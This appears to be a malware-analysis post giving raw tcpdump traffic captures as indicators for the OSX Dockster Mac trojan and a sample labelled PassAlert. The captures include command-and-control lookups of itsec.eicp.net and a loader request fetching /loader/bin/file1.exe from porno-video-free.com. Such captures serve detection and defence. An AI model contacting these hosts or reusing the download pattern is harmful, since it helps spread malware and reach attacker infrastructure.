HISTORICAL Malware Sample – MAC TROJAN OSX DOCKSTER – Traffic Sample Indicators Analysis

July 25, 2015

2012-11-29 23:57:19.365416 IP 8.8.8.8.53 > 172.29.0.109.53182: 39642 1/0/0 A 123.120.110.212 (48)

E .L.x..5..o…….m.5…8……………itsec.eicp.net……………..{xn.

2012-11-29 23:57:19.366096 IP 172.29.0.109.49294 > 123.120.110.212.8088: Flags [S], seq 2281913743, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 560397766 ecr 0,sackOK,eol], length 0

E..@.>@.@……m{xn…….=……….@………….

!f……….

 

===========================

PassAlert

===========================

2013-05-12 15:13:41.237980 IP 172.16.253.240.53 > 8.8.8.8.53: 34127+ A? porno-video-free.com. (38)

E..B……………..5.5…..O………..porno-video-free.com…..

2013-05-12 15:13:41.238039 IP 172.16.253.240.53 > 4.2.2.2.53: 34127+ A? porno-video-free.com. (38)

E..B……………..5.5…..O………..porno-video-free.com…..

2013-05-12 15:13:41.265029 IP 8.8.8.8.53 > 172.16.253.240.53: 34127 1/0/0 A 64.74.223.10 (54)

E..R……………..5.5.>…O………..porno-video-free.com……………..@J.

 

2013-05-12 15:13:41.270894 IP 172.16.253.240.1033 > 64.74.223.10.80: Flags [S], seq 3097962556, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0..@…1Z….@J.

.       .P..(<….p……………

2013-05-12 15:13:41.284000 IP 64.74.223.10.80 > 172.16.253.240.1033: Flags [S.], seq 910574124, ack 3097962557, win 64240, options [mss 1460], length 0

E..,……..@J.

…..P. 6FB,..(=`…v………

2013-05-12 15:13:41.284076 IP 172.16.253.240.1033 > 64.74.223.10.80: Flags [.], ack 1, win 64240, length 0

E..(..@…1a….@J.

.       .P..(=6FB-P…….

2013-05-12 15:13:41.284321 IP 172.16.253.240.1033 > 64.74.223.10.80: Flags [P.], seq 1:92, ack 1, win 64240, length 91

E…..@…1…..@J.

.       .P..(=6FB-P…….GET /loader/bin/file1.exe HTTP/1.1

User-Agent: Mozilla/5.0

Host: porno-video-free.com

 

 

 
